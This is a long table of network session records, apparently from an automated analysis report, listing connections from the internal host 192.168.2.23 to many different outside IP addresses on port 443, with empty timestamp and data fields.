                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17919192.168.2.235364054.165.140.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17920192.168.2.2344578188.48.153.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17921192.168.2.234022234.143.35.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17922192.168.2.234893824.224.244.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17923192.168.2.2356192192.77.83.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17924192.168.2.2357792207.18.79.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17925192.168.2.2342096108.176.255.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17926192.168.2.2342914184.244.196.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17927192.168.2.2353594181.187.108.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17928192.168.2.236081062.107.112.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17929192.168.2.2360230217.145.158.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17930192.168.2.2338222128.30.168.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17931192.168.2.234025283.84.176.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17932192.168.2.233348070.220.40.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17933192.168.2.233756877.93.136.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17934192.168.2.235079867.211.5.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17935192.168.2.234421466.187.125.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17936192.168.2.233964213.27.89.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17937192.168.2.2358230134.194.218.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17938192.168.2.2343782136.242.2.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17939192.168.2.2347844163.84.85.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17940192.168.2.234546087.157.146.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17941192.168.2.235921445.213.178.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17942192.168.2.2335680112.136.150.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17943192.168.2.2336966184.175.19.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17944192.168.2.2339300187.83.36.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17945192.168.2.235261271.158.35.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17946192.168.2.2337382152.206.89.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17947192.168.2.235931231.70.176.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17948192.168.2.234482442.33.15.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17949192.168.2.233411236.134.100.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17950192.168.2.2354226173.141.144.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17951192.168.2.2340990108.110.200.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17952192.168.2.234081850.77.174.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17953192.168.2.2352336169.214.82.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17954192.168.2.234305838.228.241.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17955192.168.2.2344236107.183.204.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17956192.168.2.2358944114.131.232.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17957192.168.2.2338714211.154.40.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17958192.168.2.2338806132.90.44.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17959192.168.2.2347762208.236.137.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17960192.168.2.2352658104.198.128.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17961192.168.2.2360064219.217.226.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17962192.168.2.2356718183.233.211.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17963192.168.2.2347892124.206.168.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17964192.168.2.2340550184.13.71.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17965192.168.2.234791847.231.64.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17966192.168.2.2339252140.28.50.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17967192.168.2.234034644.152.26.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17968192.168.2.235687670.217.88.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17969192.168.2.233769817.6.17.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17970192.168.2.23515125.234.238.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17971192.168.2.2354060174.178.210.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17972192.168.2.2335806222.111.160.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17973192.168.2.234061217.189.219.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17974192.168.2.2357794180.50.237.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17975192.168.2.235277639.39.141.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17976192.168.2.2342298194.89.195.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17977192.168.2.235815649.109.239.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17978192.168.2.2336110223.16.84.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17979192.168.2.2340010163.161.136.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17980192.168.2.2357970213.222.155.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17981192.168.2.2340636172.59.126.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17982192.168.2.2359400137.86.0.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17983192.168.2.236070448.113.103.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17984192.168.2.234101676.211.201.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17985192.168.2.235791432.87.129.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17986192.168.2.2332832162.123.101.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17987192.168.2.234746245.186.244.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17988192.168.2.235689217.213.138.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17989192.168.2.2340952125.103.160.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17990192.168.2.235898677.211.51.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17991192.168.2.234900659.102.27.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17992192.168.2.2349206137.193.145.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17993192.168.2.234053281.190.150.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17994192.168.2.2358728160.96.190.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17995192.168.2.2335172155.204.65.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17996192.168.2.2348686218.248.7.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17997192.168.2.2339640209.240.228.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17998192.168.2.234895067.247.26.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17999192.168.2.235950092.110.104.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18000192.168.2.2337384212.26.254.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18001192.168.2.235913423.21.240.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18002192.168.2.2339332148.137.179.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18003192.168.2.2342968153.209.143.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18004192.168.2.2333662173.202.28.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18005192.168.2.2345158148.54.127.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18006192.168.2.2347990218.1.98.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18007192.168.2.235064618.182.107.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18008192.168.2.2349406118.248.230.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18009192.168.2.2349842200.45.185.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18010192.168.2.2344234105.20.228.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18011192.168.2.2355306165.7.167.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18012192.168.2.234135846.99.173.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18013192.168.2.2347106155.203.100.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18014192.168.2.2348964124.32.141.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18015192.168.2.235957892.140.210.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18016192.168.2.2346684217.192.181.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18017192.168.2.235211241.225.112.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18018192.168.2.235966044.115.114.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18019192.168.2.235073283.12.17.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18020192.168.2.2359798119.132.5.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18021192.168.2.235323440.231.201.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18022192.168.2.2348792169.158.135.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18023192.168.2.2351190121.8.113.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18024192.168.2.2354940154.74.17.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18025192.168.2.234414069.172.9.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18026192.168.2.2345340121.111.152.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18027192.168.2.2336696189.37.60.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18028192.168.2.2344432167.25.44.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18029192.168.2.2355462134.194.240.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18030192.168.2.2355838133.232.115.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18031192.168.2.233880895.248.0.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18032192.168.2.2348152139.13.105.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18033192.168.2.2341552141.114.172.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18034192.168.2.235101692.213.229.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18035192.168.2.234708680.133.31.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18036192.168.2.233949284.169.137.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18037192.168.2.2359964205.135.3.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18038192.168.2.234785283.107.96.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18039192.168.2.234817879.124.120.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18040192.168.2.233462646.139.80.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18041192.168.2.2347884110.245.79.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18042192.168.2.234980459.189.32.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18043192.168.2.235825099.58.34.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18044192.168.2.2345916169.233.212.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18045192.168.2.2346786126.115.45.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18046192.168.2.233482273.9.228.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18047192.168.2.233603023.128.56.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18048192.168.2.2335134118.139.31.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18049192.168.2.2353920194.194.140.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18050192.168.2.2350928101.28.3.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18051192.168.2.233678036.124.63.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18052192.168.2.2348530117.203.27.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18053192.168.2.235489241.129.119.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18054192.168.2.2336848189.97.30.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18055192.168.2.234620495.145.49.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18056192.168.2.235502293.209.188.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18057192.168.2.2360018189.162.111.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18058192.168.2.2343576164.95.156.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18059192.168.2.2354466141.10.252.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18060192.168.2.23395421.72.65.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18061192.168.2.2345720149.24.188.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18062192.168.2.2336830182.46.228.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18063192.168.2.235099850.34.160.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18064192.168.2.2346160167.8.92.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18065192.168.2.2357422212.59.24.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18066192.168.2.233888425.93.219.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18067192.168.2.2347548101.58.168.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18068192.168.2.234424859.28.47.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18069192.168.2.2348576121.2.184.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18070192.168.2.2351938207.227.118.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18071192.168.2.2358034168.89.81.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18072192.168.2.2343970111.245.177.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18073192.168.2.2360924161.103.68.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18074192.168.2.2334794184.148.251.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18075192.168.2.2347726144.9.2.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18076192.168.2.23494002.97.28.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18077192.168.2.2360432208.79.173.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18078192.168.2.234784290.101.127.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18079192.168.2.2341874114.67.211.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18080192.168.2.234977867.44.233.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18081192.168.2.2353232116.81.88.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18082192.168.2.2350012144.255.253.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18083192.168.2.234081875.80.49.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18084192.168.2.2346354123.122.111.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18085192.168.2.235318843.29.9.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18086192.168.2.2338960118.108.23.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18087192.168.2.236037612.28.127.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18088192.168.2.233792217.154.54.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18089192.168.2.234426825.90.168.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18090192.168.2.2358238108.221.80.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18091192.168.2.2334470129.57.105.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18092192.168.2.235497681.96.223.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18093192.168.2.236014240.64.10.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18094192.168.2.2340856136.176.112.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18095192.168.2.2355878121.114.173.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18096192.168.2.2347280162.149.248.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18097192.168.2.235341034.153.1.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18098192.168.2.23404368.169.207.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18099192.168.2.233317046.163.41.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18100192.168.2.2349820183.236.218.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18101192.168.2.235037027.255.82.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18102192.168.2.2355058220.116.54.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18103192.168.2.2350542107.175.188.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18104192.168.2.235928264.37.104.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18105192.168.2.2340444202.165.107.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18106192.168.2.2334870109.228.206.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18107192.168.2.2350144219.142.233.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18108192.168.2.2352148138.231.224.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18109192.168.2.2348258117.142.15.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18110192.168.2.2337152183.72.142.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18111192.168.2.2349036201.87.3.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18112192.168.2.2357262148.223.71.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18113192.168.2.235965040.187.118.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18114192.168.2.235953486.102.219.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18115192.168.2.2334360174.213.242.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18116192.168.2.234975018.84.63.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18117192.168.2.235272840.230.5.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18118192.168.2.2342086109.32.44.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18119192.168.2.2350848193.99.176.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18120192.168.2.2333530170.13.102.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18121192.168.2.2348818187.43.203.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18122192.168.2.235824219.215.177.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18123192.168.2.2358832165.47.250.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18124192.168.2.2336754135.169.40.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18125192.168.2.2355526150.93.246.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18126192.168.2.233289276.112.89.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18127192.168.2.2339520148.205.107.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18128192.168.2.233880042.227.60.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18129192.168.2.235959645.125.118.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18130192.168.2.2333854110.90.246.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18131192.168.2.2353628112.1.22.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18132192.168.2.235891219.186.221.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18133192.168.2.234599057.128.232.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18134192.168.2.235341665.117.52.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18135192.168.2.2341710174.38.2.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18136192.168.2.233755692.174.121.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18137192.168.2.234470485.163.117.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18138192.168.2.2333068101.96.85.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18139192.168.2.23595205.24.219.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18140192.168.2.2352538171.39.0.81443
